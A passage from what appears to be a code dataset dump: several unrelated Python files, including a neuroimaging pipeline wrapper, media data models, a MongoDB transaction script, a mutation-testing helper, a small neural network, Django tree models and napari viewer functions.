pedirSE1)\n pedirSE2 = tr(\"ijk\", \"xyz\", pedirSE2)\n if pedirSE1 == pedirSE2:\n raise Exception(\n \"SpinEchoPositive and SpinEchoNegative have the same \\\n PhaseEncodingDirection \"\n + str(pedirSE1)\n + \" !\"\n )\n if not (\n ((pedirSE1, pedirSE2) == (\"x\", \"x-\"))\n or ((pedirSE1, pedirSE2) == (\"y\", \"y-\"))\n ) and not (\n ((pedirSE1, pedirSE2) == (\"x-\", \"x\"))\n or ((pedirSE1, pedirSE2) == (\"y-\", \"y\"))\n ):\n raise Exception(\n \"Unrecognized SpinEcho phase-encoding directions \"\n + str(pedirSE1)\n + \", \"\n + str(pedirSE2)\n + \".\"\n )\n else:\n raise Exception(\n \"SpinEchoPositive or SpinEchoNegative input \\\n is missing PhaseEncodingDirection metadata!\"\n )\n elif \"GeneralElectricFieldMap\" in inputs.keys():\n raise Exception(\"Cannot currently handle GeneralElectricFieldmap!\")\n\n\ndef execute(context):\n environ = context.gear_dict[\"environ\"]\n config = context.config\n os.makedirs(context.work_dir + \"/\" + config[\"Subject\"], exist_ok=True)\n command = []\n command.extend(context.gear_dict[\"command_common\"])\n command.append(\n op.join(environ[\"HCPPIPEDIR\"], \"PreFreeSurfer\", \"PreFreeSurferPipeline.sh\")\n )\n command = build_command_list(command, context.gear_dict[\"PRE-params\"])\n\n stdout_msg = (\n \"PreFreeSurfer logs (stdout, stderr) will be available \"\n + 'in the file \"pipeline_logs.zip\" upon completion.'\n )\n\n context.log.info(\"PreFreeSurfer command: \\n\")\n exec_command(context, command, stdout_msg=stdout_msg)\n","sub_path":"utils/args/PreFreeSurfer.py","file_name":"PreFreeSurfer.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"443856755","text":"import os\nfrom PIL import Image\n\nfrom core.envs import IMAGE_DIR, THUMBNAIL_DIR\n\nfrom .parser import (\n parse_carousel,\n parse_comments,\n parse_datetime,\n)\n\n\nclass User:\n def __init__(self, id, username, full_name):\n if isinstance(id, float):\n id = \"\"\n if isinstance(username, float):\n username = \"\"\n if isinstance(full_name, float):\n full_name = \"\"\n\n self.id = id\n self.username = username\n self.full_name = full_name\n\n def __str__(self):\n return f\"User({self.username})\"\n\n\nclass Location:\n def __init__(self, id, name, slug):\n if isinstance(id, float):\n id = \"\"\n if isinstance(name, float):\n name = \"\"\n if isinstance(slug, float):\n slug = \"\"\n\n self.id = id\n self.name = name\n self.slug = slug\n\n def __str__(self):\n return f\"Location({self.name})\"\n\n\nclass Media:\n \"\"\" Abstract class representing Media object \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n ):\n self.id = id\n self.media_code = media_code\n self.media_link = media_link\n self.media_type = media_type\n self.time = time\n self.likes_count = likes_count\n self.caption = caption\n self.comments = comments\n self.user = user\n self.location = location\n\n def __attr_str__(self):\n return (\n f\"id={self.id},\"\n f\"date={self.time.strftime('%Y-%m-%d')},\"\n f\"likes={self.likes_count},\"\n f\"user={self.user},\"\n f\"loc={self.location}\"\n )\n\n def __str__(self):\n return f\"Media({self.__attr_str__()})\"\n\n\nclass MediaImage(Media):\n \"\"\" Concrete class representing image media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n image_url,\n thumbnail_url,\n image=None,\n thumbnail=None,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.image_url = image_url\n self.thumbnail_url = thumbnail_url\n self.image = image\n self.thumbnail = thumbnail\n\n def load_image(self, root_dir=\"\"):\n self.image = Image.open(\n os.path.join(root_dir, IMAGE_DIR, f\"{self.id}.jpeg\"))\n return self.image\n\n def load_thumbnail(self, root_dir=\"\"):\n self.thumbnail = Image.open(\n os.path.join(root_dir, THUMBNAIL_DIR, f\"{self.id}.jpeg\"))\n return self.thumbnail\n\n @staticmethod\n def create_from_row(row):\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n image_url = row['img_highres_url']\n thumbnail_url = row['img_thumbnail_url']\n return MediaImage(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n image_url,\n thumbnail_url,\n )\n\n def __str__(self):\n return f\"MediaImage({self.__attr_str__()})\"\n\n\nclass MediaVideo(Media):\n \"\"\" Concrete class representing video media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n video_url,\n thumbnail_url,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.video_url = video_url\n self.thumbnail_url = thumbnail_url\n\n def load_image(self, root_dir=\"\"):\n image = Image.open(os.path.join(root_dir, IMAGE_DIR, self.id))\n return image\n\n def load_thumbnail(self, root_dir=\"\"):\n thumbnail = Image.open(\n os.path.join(root_dir, THUMBNAIL_DIR, self.id))\n return thumbnail\n\n @staticmethod\n def create_from_row(row):\n video_url = row['img_highres_url']\n thumbnail_url = row['img_thumbnail_url']\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n return MediaVideo(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n video_url,\n thumbnail_url,\n )\n\n def __str__(self):\n return f\"MediaVideo({self.__attr_str__()})\"\n\n\nclass MediaCarousel(Media):\n \"\"\" Concrete class representing carousel media \"\"\"\n def __init__(\n self,\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n medias,\n ):\n super().__init__(\n id,\n media_code,\n media_link,\n media_type,\n time,\n likes_count,\n caption,\n comments,\n user,\n location,\n )\n self.medias = medias\n\n @staticmethod\n def create_from_row(row):\n user = User(\n row['user_id'],\n row['username'],\n row['user_full_name'],\n )\n location = Location(\n row['location_id'],\n row['location_name'],\n row['location_slug'],\n )\n return MediaCarousel(\n row['media_id'],\n row['media_code'],\n row['media_link'],\n row['type'],\n parse_datetime(row['created_time']),\n row['likes_count'],\n row['caption'],\n parse_comments(row['comments']),\n user,\n location,\n parse_carousel(row),\n )\n\n def __str__(self):\n return f\"MediaCarousel({self.__attr_str__()})\"\n","sub_path":"backend/core/db/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"411621350","text":"\n\ndef delete_duplicate_hosts(self, hosts):\n ' Delete duplicated hosts '\n unique_hosts = []\n listed_hostnames = []\n for zabbix_host in hosts:\n if (zabbix_host['name'] in listed_hostnames):\n continue\n unique_hosts.append(zabbix_host)\n listed_hostnames.append(zabbix_host['name'])\n return unique_hosts\n","sub_path":"Data Set/bug-fixing-2/00efa26cdb7a15bdb049104b3f6330975b17564c--fix.py","file_name":"00efa26cdb7a15bdb049104b3f6330975b17564c--fix.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"549304613","text":"# this script is used to extract gas price and related waiting time\nimport pandas as pd\nimport re\nimport json\nimport unicodecsv as csv\nimport pymongo\nfrom pymongo.errors import BulkWriteError\n\nDEBUG = True\n\n\n# remove substrings before and after two characters\n# exmaple:\n# input: '12@[123]57'. '[',']'\n# output: '[123]'\ndef remove_redundant_characters(str, char1, char2):\n left_index = str.find(char1)\n right_index = str.find(char2)\n result = str[left_index: (right_index +1)]\n return result\n\n# extract gas and waiting time information from raw data\n# input: str by reading csv files\n# output: json format data\ndef extract_data(str):\n # extract data as string from file\n print(str)\n result = re.search('result:(.*)}', str)\n result = result.group(0) # type: object\n result = remove_redundant_characters(result, '[', ']')\n\n # extract data as json from string\n result = json.loads(result)\n return result\n\n\n# write data into file\ndef write_to_file(file,fieldnames, data):\n with open(file, 'ab')as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames,quoting=csv.QUOTE_ALL)\n writer.writeheader()\n try:\n for item in data:\n assert isinstance(item, object)\n writer.writerow(item)\n except Exception as e :\n print(\"error when writing data to file\")\n print(e.message)\n csvfile.close()\n\ndef check_duplicate():\n db = mongo_client[\"transactions\"]\n col = db[\"processed\"]\n try: \n pipeline = [ \n {'$group': { \n '_id': {'txhash': \"$txhash\"} \n } \n }\n ]\n cursor = col.aggregate(pipeline)\n data = []\n for document in cursor:\n data.append(document['_id']['txhash'])\n \n return(len(data) != len(set(data)))\n\n except Exception as e:\n print('err in check_duplicate')\n \n return False\n#####################################################################\n\n# query mongodb for all pending txs\nmongo_client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = mongo_client[\"transactions\"]\ncol = db[\"pending\"]\nresults = []\n\nif DEBUG:\n doc = col.find({}).limit(10)\nelse:\n doc = col.find({})\n\n# extract transaction ids from the collections\nfor row in doc:\n arr = json.loads(row['data'])\n if('result' in arr):\n arr_hash = arr['result']\n time = row['time']\n seconds = row['seconds']\n\n for tx_hash in arr_hash:\n item = {\"txhash\": tx_hash, \"time\": time, \"seconds\": seconds }\n results.append(item)\n \n #print(results)\nprint(\"number of items:\")\nprint(len(results))\n\n# store extracted data into mongodb\ndb = mongo_client[\"transactions\"]\ncol = db[\"processed\"]\ncol.create_index([('txhash', pymongo.ASCENDING),('seconds',pymongo.ASCENDING)], unique = True)\n\n\ntry: \n col.insert_many(results, ordered=False)\n\nexcept BulkWriteError as bwe:\n # skip duplicate entries\n print(\"Batch Inserted with some errors. May be some duplicates were found and are skipped.\")\n\nexcept Exception as e:\n print(e.message)\n\ncount = col.count()\nprint(count)\n\n# check if any duplicate entries in the mongodb regarding inserted data\n#print(check_duplicate())\n\n","sub_path":"scripts/save_transactions.py","file_name":"save_transactions.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"564570993","text":"import os\nimport random\nimport copy\nimport re\nimport time\nimport numpy as np\n\nclass Mutation:\n def __init__(self, path):\n self.operator = [\"*\",\"-\",\"+\",\"|\",\"&\",\"<\",\">\",\"^\"]\n self.path= path\n self.original_content = self.open_file()\n self.matrix_of_mutation = np.matrix([[0.7, 0.1, 0.1, 0.02, 0.02, 0.02,0.02,0.02],\n [0.02,0.7,0.08,0.02, 0.02, 0.02, 0.02, 0.02],\n [0.09,0.11,0.7, 0.02, 0.02, 0.02, 0.02, 0.02],\n [0.02, 0.02, 0.02, 0.7, 0.18, 0.02, 0.02, 0.02],\n [0.02, 0.01,0.01,0.2,0.7,0.02,0.02, 0.02],\n [ 0.01, 0.01,0.01,0.01,0.1,0.7,0.24,0.01],\n [0.01,0.01,0.01,0.01,0.02,0.23,0.7,0.1],\n [0.15,0.03,0.02,0.02,0.02,0.02,0.02,0.07]])\n\n self.operators_in_file = {}\n self.combination = list()\n self.maximum = 0\n\n def open_file(self):\n with open(self.path, \"r\") as file:\n content = file.readlines()\n file.close()\n return content\n\n def find_all_operators(self):\n oper_occurs = dict()\n for index, line in enumerate(self.original_content):\n for opt in self.operator:\n if opt in line:\n start, stop = [(m.start(0), m.end(0)) for m in re.finditer(re.escape(opt), line)][0]\n self.operators_in_file[index,start, stop] = opt\n if opt in oper_occurs.keys():\n oper_occurs[opt] +=1\n else:\n oper_occurs[opt] = 1\n self.maximum = max(oper_occurs, key=oper_occurs.get)\n\n\n def combination_of_mut(self):\n for index, line in enumerate(self.operators_in_file):\n original = self.operators_in_file[line]\n for i in range(len(self.operator) - 1):\n mut = self.change_operator(original, i)\n self.combination.append([original, mut, line])\n\n def save_mutate_code(self,folder, file):\n content = copy.deepcopy(self.original_content)\n self.choose_mutation()\n content[self.chosen_oper_index[2][0]] = self.replace_char(content[self.chosen_oper_index[2][0]],self.chosen_oper_index[2][1],\n self.chosen_oper_index[2][2],self.chosen_oper_index[1])\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n name = \"M\" + file\n with open(os.path.join(folder, name), \"w\") as file:\n for line in content:\n file.write(line)\n return content\n\n\n def replace_char(self,text,start, end, replacement):\n return '%s%s%s'%(text[:start],replacement,text[end:])\n\n def change_operator(self,opt,index):\n operators = copy.deepcopy(self.operator)\n operators.remove(opt)\n return operators[index]\n\n def count_propability(self):\n p = list()\n matrix = self.matrix_of_mutation\n propablity = list()\n hightest = self.get_index([self.maximum,self.maximum])\n # if self.mutant == True:\n # matrix = np.transpose(matrix)\n # print(\"poo\",matrix)\n h = matrix[hightest[0], hightest[1]]\n for i in self.combination:\n indexs = self.get_index(i)\n p.append(matrix[indexs[0],indexs[1]]/h)\n for i in p:\n propablity.append(i/sum(np.array(p)))\n self.propablity = np.array(propablity)\n #return np.array(propablity)\n\n def choose_mutation(self):\n self.chosen_oper_index = self.combination[random.choice(list(enumerate(self.propablity)))[0]]\n\n def get_index(self,char):\n return [self.operator.index(char[0]),self.operator.index(char[1])]\n\n\n\n\n\n# m = Mutation ('codes/neww.py')\n# m.find_all_operators()\n#\n# m.combination_of_mut()\n# m.count_propability()\n# m.choose_mutation()\n# m.save_mutate_code(\"mut\",\"neww.py\")\n# prob = m.count_propability(mut,most_occurs)\n# index = m.choose_mutation(prob)\n# m.save_mut_code(contentes[index],\"mut\",\"foo.py\",index)\n\n# d = Mutation(name,True)\n# opt , most_occurs = d.find_all_operators()\n# mut, contentes =d.mut_char(opt)\n# prob = d.count_propability(mut,most_occurs)\n# index = d.choose_mutation(prob)\n\n\n\n","sub_path":"new_mutation.py","file_name":"new_mutation.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"279571655","text":"\"\"\"\nПопробуем обучить нейронную сеть распозновать цвет не пинов\nПолучать на вход при обучении цвета и маркер к ним\nДАнные\nЦвет (b,g,r) - маркер\nМаркеры - Цвет пина, цвет не пина\nВыход\nЭтот цвет есть ецет пина - 1, этот цвет цвет не пина - 0\n\"\"\"\n\nimport cv2\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport json\nimport copy\nfrom SegmentationAlgorithms.Tools.Tools import generate_dataset_from_supervisely\nimport tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Activation, BatchNormalization\n\n\ndef create_network(learning_rate=0.03):\n\t\"\"\"\n\tПоэкспериментируетм с разбиением цветов пинов и не пинов\n\t:return:\n\t\"\"\"\n\n\tx = tf.placeholder(dtype=tf.float32, shape=[3], name='pixels')\n\ty = tf.placeholder(dtype=tf.uint8, shape=[None, 1], name='desired_out')\n\n\tx_norm = tf.div(x, 255.0)\n\ty_one_hot = tf.one_hot(y, depth=2)\n\n\thidden_1 = tf.layers.dense(inputs=x_norm, units=3, name='hidden_one', activation=tf.nn.leaky_relu)\n\tnet_out = tf.layers.dense(inputs=hidden_1, units=2, name='net_out', activation=None)\n\n\tnet_out_squeezed = tf.squeeze(net_out)\n\n\tloss = tf.losses.softmax_cross_entropy(onehot_labels=y_one_hot, logits=net_out_squeezed)\n\ttrain_step = tf.train.AdadeltaOptimizer(learning_rate).minimize(loss)\n\taccuracy = tf.metrics.accuracy(labels=y_one_hot, predictions=net_out_squeezed, name='accuracy')\n\t# accuracy_metric = tf.summary.scalar(name='accuracy_summary', tensor=accuracy)\n\n\treturn {'x': x, 'y': y, 'train_step': train_step, 'accuracy': accuracy}\n\ndef create_network_keras():\n\tmodel = Sequential([\n\t\tFlatten(input_shape=(3,), name='F1'),\n\t\tDense(units=10, activation=tf.keras.activations.relu, name='D1'),\n\t\tBatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True,\n\t\t beta_initializer='zeros', gamma_initializer='ones',\n\t\t moving_mean_initializer='zeros', moving_variance_initializer='ones',\n\t\t beta_regularizer=None, gamma_regularizer=None, beta_constraint=None,\n\t\t gamma_constraint=None),\n\t\tDense(units=10, activation=tf.keras.activations.relu, name='D11'),\n\t\tBatchNormalization(axis=-1, momentum=0.99, epsilon=0.001, center=True, scale=True,\n\t\t beta_initializer='zeros', gamma_initializer='ones',\n\t\t moving_mean_initializer='zeros', moving_variance_initializer='ones',\n\t\t beta_regularizer=None, gamma_regularizer=None, beta_constraint=None,\n\t\t gamma_constraint=None),\n\t\tDense(units=2, name='D2'),\n\t\tActivation(activation=tf.keras.activations.softmax, name='OUT')\n\t])\n\n\tmodel.compile(\n\t\toptimizer=tf.train.AdadeltaOptimizer(0.003),\n\t\tloss='binary_crossentropy',\n\t\tmetrics=['accuracy'])\n\n\treturn model\n\ndef train():\n\tpass\n\n\nmodel = None\nimage = None\n\n\ndef onMouse(event,x,y,flags,param):\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\tpixel = np.array([image[y, x]])\n\t\t# print(type(pixel), pixel.shape)\n\t\tprint('pixel is', pixel)\n\t\tpred = model.predict(pixel)\n\t\tpin = False if pred[0][0] > pred[0][1] else True\n\t\tprint(pred)\n\t\tprint('Это пин', pin)\n\n\nif __name__ == '__main__':\n\tglobal model\n\tmodel = create_network_keras()\n\n\tmodel.summary()\n\n\tpins = np.load('dataset/pins.npy')\n\tpin_labels = np.ones(shape=(pins.shape[0], 1))\n\tnot_pins = np.load('dataset/not_pins.npy')\n\tnot_pin_labels = np.zeros(shape=(not_pins.shape[0], 1))\n\n\tx = np.vstack((pins, not_pins))\n\tlabels = np.vstack((pin_labels, not_pin_labels))\n\tx_norm = x / 255.0\n\tdel x\n\n\tmodel.fit(x_norm, labels, epochs=1, batch_size=512, validation_split=0.3)\n\n\n#\n#\n\n\n\n\n","sub_path":"SegmentationAlgorithms/BGPecker.py","file_name":"BGPecker.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"145831136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019-04-03 17:10\n# @Author : yangzhen\n# @Site : \n# @File : get_data.py\n# @Software: PyCharm\n#获取Excel数据\n\nfrom util.operation_excel import OperationExcel\nimport data_config\nfrom util.operation_json import OperationJson\n\nclass GetData:\n def __init__(self):\n self.opera_excel = OperationExcel()\n\n #去获取Excel行数,就是case的个数\n def get_case_lines(self):\n self.opera_excel.get_lines()\n\n\n #获取是否执行\n def get_is_run(self,row):\n flag = None\n col = int(data_config.get_run())\n run_model = self.opera_excel.get_cell_value(row,col)\n\n\n #是否携带header\n def is_header(self,row):\n col = int(data_config.get_header())\n header = self.opera_excel.get_cell_value(row,col)\n if header == 'yes':\n return data_config.get_data_value()\n else:\n return None\n\n #获取请求方式\n def get_request_method(self,row):\n col = int(data_config.get_run_way())\n request_method = self.opera_excel.get_cell_value(row,col)\n return request_method\n\n #获取URL\n def get_request_url(self,row):\n col = int(data_config.get_url())\n request_url = self.opera_excel.get_cell_value(row,col)\n return request_url\n\n #获取请求数据\n def get_request_data(self,row):\n col = int(data_config.get_data())\n data = self.opera_excel.get_cell_value(row,col)\n if data == '':\n return None\n return data\n\n #通过获取关键字拿到data\n def get_data_for_json(self,row):\n opera_json = OperationJson()\n request_data = opera_json.get_data(self.get_request_data(row))\n return request_data\n\n #获取预期结果\n def get_expect_data(self,row):\n col = int(data_config.get_expect())\n expect = self.opera_excel.get_cell_value(row,col)\n if expect == '':\n return None\n\n return expect\n\n #写入实际结果\n def write_result(self,row,value):\n col = int(data_config.get_result())\n self.opera_excel.write_value(row,col,value)\n\n #获取依赖数据的key\n def get_dependent_key(self,row):\n col = int(data_config.get_data_depend())\n depent_key = self.opera_excel.get_cell_value(row,col)\n if depent_key == \"\":\n return None\n else:\n return depent_key\n\n\n #判断是否有case依赖\n def is_depend(self,row):\n col = int(data_config.get_field_depend())\n depend_case_id = self.opera_excel.get_cell_value(row,col)\n if depend_case_id == \"\":\n return None\n else:\n return depend_case_id\n\n #获取数据依赖字段\n def get_depend_field(self,row):\n col = int(data_config.get_field_depend())\n data = self.opera_excel.get_cell_value(row,col)\n if data == \"\":\n return None\n else:\n return data\n","sub_path":"data/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"113686771","text":"import numpy as np\nimport MLP\n\n\"\"\"\nReads and writes MLP-related data from and to files.\n\"\"\" \n\ndataPath = \"../../data/Python\"\n\ninputFilePath = dataPath + \"/input.txt\"\nlabelsFilePath = dataPath + \"/labels.txt\"\noutputFilePath = dataPath + \"/network.txt\"\n\nplotOutputFilePath = dataPath + \"/plotData.txt\"\n\ndef readInputs(): \n return np.loadtxt(inputFilePath, dtype=float, delimiter=\",\")\n\ndef readLabels(): \n return np.loadtxt(labelsFilePath, dtype=float, delimiter=\",\")\n\ndef writeModel(weights, biases, transferFunctions):\n fileWriter = open(outputFilePath, 'w')\n fileWriter.truncate()\n \n fileWriter.write(\"--------------------------------------------------------\\n\\n\")\n for layer in range(0, len(weights)):\n fileWriter.write(\"Layer \" + str(layer + 1) + \"\\n\");\n fileWriter.write(\"\\n Weights:\\n\" + str(weights[layer]) + \"\\n\")\n fileWriter.write(\"\\n Biases:\\n\" + str(biases[layer]) + \"\\n\")\n fileWriter.write(\"\\n Transfer Function:\\n\" + \" \" + \n MLP.getTransferFunctionAsString(transferFunctions[layer]) + \"\\n\")\n fileWriter.write(\"\\n--------------------------------------------------------\\n\\n\")\n \n fileWriter.close()\n \n\"\"\" \nFor one-dimensional data only.\n\"\"\"\ndef writePlotData(mlp, lower, upper, step):\n fileWriter = open(plotOutputFilePath, 'w')\n fileWriter.truncate()\n \n firstLine = True\n for x in np.arange(lower, upper + step/2, step):\n if (firstLine == False):\n fileWriter.write(\"\\n\")\n y = np.asarray(np.asarray(mlp.predict(x))[0])[0]\n fileWriter.write(str(x) + \",\" + str(y) + \",\")\n firstLine = False\n \n fileWriter.close()\n\ndef setFilePaths(inputFilePath, labelsFilePath, outputFilePath): \n self.inputFilePath = inputFilePath\n self.labelFilePath = labelsFilePath\n self.outputFilePath = outputFilePath\n","sub_path":"RNN/src/pythonMLP/MLPData.py","file_name":"MLPData.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"553169014","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom tree_models.functions import Replace\n\n\nclass AbstractTree(models.Model):\n class Meta:\n abstract = True\n ordering = ['-path']\n\n def save(self, *args, **kwargs):\n if self.pk is None:\n self.create()\n else:\n self.update()\n\n def create(self):\n super(AbstractTree, self).save(force_insert=True)\n\n if self.parent:\n self.depth = self.parent.depth + 1\n self.path = \"{0}{1}/\".format(self.parent.path, self.id)\n else:\n self.path = \"_{}/\".format(self.id)\n\n super(AbstractTree, self).save(force_update=True)\n\n def update(self):\n depth = self.depth\n path = self.path\n\n if self.parent:\n #if self.depth < self.parent.depth:\n # depth = self.parent.depth\n # path = self.parent.path\n #else:\n # depth = self.depth\n # path = self.path\n\n self.depth = self.parent.depth + 1\n self.path = \"{0}{1}/\".format(self.parent.path, self.id)\n else:\n # depth = self.depth\n # path = self.path\n\n self.depth = 0\n self.path = \"_{}/\".format(self.id)\n\n self.update_childs(depth, path)\n\n super(AbstractTree, self).save(force_update=True)\n\n def update_childs(self, depth, path):\n result = None\n queryset = self._default_manager.filter(path__startswith=path)\n\n count = queryset.count()\n if count:\n kwargs = {'path': Replace('path', path, self.path)}\n\n if self.depth < depth:\n depth_diff = depth - self.depth\n kwargs['depth'] = models.F('depth') - depth_diff\n elif self.depth > depth:\n depth_diff = self.depth - depth\n kwargs['depth'] = models.F('depth') + depth_diff\n\n result = queryset.update(**kwargs)\n return result\n\n def delete(self, *args, **kwargs):\n self.delete_childs()\n super(AbstractTree, self).delete(*args, **kwargs)\n\n def delete_childs(self):\n result = None\n queryset = self._default_manager.filter(path__startswith=self.path)\n\n count = queryset.count()\n if count:\n result = queryset.delete()\n return result\n\n\nclass Tree(AbstractTree):\n parent = models.ForeignKey(\n 'self',\n verbose_name=_('Parent'),\n blank=True,\n null=True\n )\n path = models.TextField(_('Path'), editable=False)\n depth = models.PositiveIntegerField(_('Depth'), default=0, editable=False)\n","sub_path":"tree_models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"484884253","text":"\"\"\"Methods to create a new viewer instance then add a particular layer type.\n\nAll functions follow this pattern, (where is replaced with one\nof the layer types, like \"image\", \"points\", etc...):\n\n.. code-block:: python\n\n def view_(*args, **kwargs):\n # ... pop all of the viewer kwargs out of kwargs into viewer_kwargs\n viewer = Viewer(**viewer_kwargs)\n add_method = getattr(viewer, f\"add_{}\")\n add_method(*args, **kwargs)\n return viewer\n\"\"\"\nimport inspect\n\nfrom numpydoc.docscrape import NumpyDocString as _NumpyDocString\n\nfrom .viewer import Viewer\n\n__all__ = [\n 'view_image',\n 'view_labels',\n 'view_path',\n 'view_points',\n 'view_shapes',\n 'view_surface',\n 'view_tracks',\n 'view_vectors',\n]\n\n_doc_template = \"\"\"Create a viewer and add a{n} {layer_string} layer.\n\n{params}\n\nReturns\n-------\nviewer : :class:`napari.Viewer`\n The newly-created viewer.\n\"\"\"\n\n_VIEW_DOC = _NumpyDocString(Viewer.__doc__)\n_VIEW_PARAMS = \" \" + \"\\n\".join(_VIEW_DOC._str_param_list('Parameters')[2:])\n\n\ndef _merge_docstrings(add_method, layer_string):\n # create combined docstring with parameters from add_* and Viewer methods\n import textwrap\n\n add_method_doc = _NumpyDocString(add_method.__doc__)\n\n # this ugliness is because the indentation of the parsed numpydocstring\n # is different for the first parameter :(\n lines = add_method_doc._str_param_list('Parameters')\n lines = lines[:3] + textwrap.dedent(\"\\n\".join(lines[3:])).splitlines()\n params = \"\\n\".join(lines) + \"\\n\" + textwrap.dedent(_VIEW_PARAMS)\n n = 'n' if layer_string.startswith(tuple('aeiou')) else ''\n return _doc_template.format(n=n, layer_string=layer_string, params=params)\n\n\ndef _merge_layer_viewer_sigs_docs(func):\n \"\"\"Make combined signature, docstrings, and annotations for `func`.\n\n This is a decorator that combines information from `Viewer.__init__`,\n and one of the `viewer.add_*` methods. It updates the docstring,\n signature, and type annotations of the decorated function with the merged\n versions.\n\n Parameters\n ----------\n func : callable\n `view_` function to modify\n\n Returns\n -------\n func : callable\n The same function, with merged metadata.\n \"\"\"\n from .utils.misc import _combine_signatures\n\n # get the `Viewer.add_*` method\n layer_string = func.__name__.replace(\"view_\", \"\")\n if layer_string == 'path':\n add_method = Viewer.open\n else:\n add_method = getattr(Viewer, f'add_{layer_string}')\n\n # merge the docstrings of Viewer and viewer.add_*\n func.__doc__ = _merge_docstrings(add_method, layer_string)\n\n # merge the signatures of Viewer and viewer.add_*\n func.__signature__ = _combine_signatures(\n add_method, Viewer, return_annotation=Viewer, exclude=('self',)\n )\n\n # merge the __annotations__\n func.__annotations__ = {\n **add_method.__annotations__,\n **Viewer.__init__.__annotations__,\n 'return': Viewer,\n }\n\n # _forwardrefns_ is used by stubgen.py to populate the globalns\n # when evaluate forward references with get_type_hints\n func._forwardrefns_ = {**add_method.__globals__}\n return func\n\n\n_viewer_params = inspect.signature(Viewer).parameters\n\n\ndef _make_viewer_then(add_method: str, args, kwargs) -> Viewer:\n \"\"\"Utility function that creates a viewer, adds a layer, returns viewer.\"\"\"\n vkwargs = {k: kwargs.pop(k) for k in list(kwargs) if k in _viewer_params}\n viewer = Viewer(**vkwargs)\n if 'kwargs' in kwargs:\n kwargs.update(kwargs.pop(\"kwargs\"))\n method = getattr(viewer, add_method)\n method(*args, **kwargs)\n return viewer\n\n\n# Each of the following functions will have this pattern:\n#\n# def view_image(*args, **kwargs):\n# # ... pop all of the viewer kwargs out of kwargs into viewer_kwargs\n# viewer = Viewer(**viewer_kwargs)\n# viewer.add_image(*args, **kwargs)\n# return viewer\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_image(*args, **kwargs):\n return _make_viewer_then('add_image', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_labels(*args, **kwargs):\n return _make_viewer_then('add_labels', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_points(*args, **kwargs):\n return _make_viewer_then('add_points', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_shapes(*args, **kwargs):\n return _make_viewer_then('add_shapes', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_surface(*args, **kwargs):\n return _make_viewer_then('add_surface', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_tracks(*args, **kwargs):\n return _make_viewer_then('add_tracks', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_vectors(*args, **kwargs):\n return _make_viewer_then('add_vectors', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_path(*args, **kwargs):\n return _make_viewer_then('open', args, 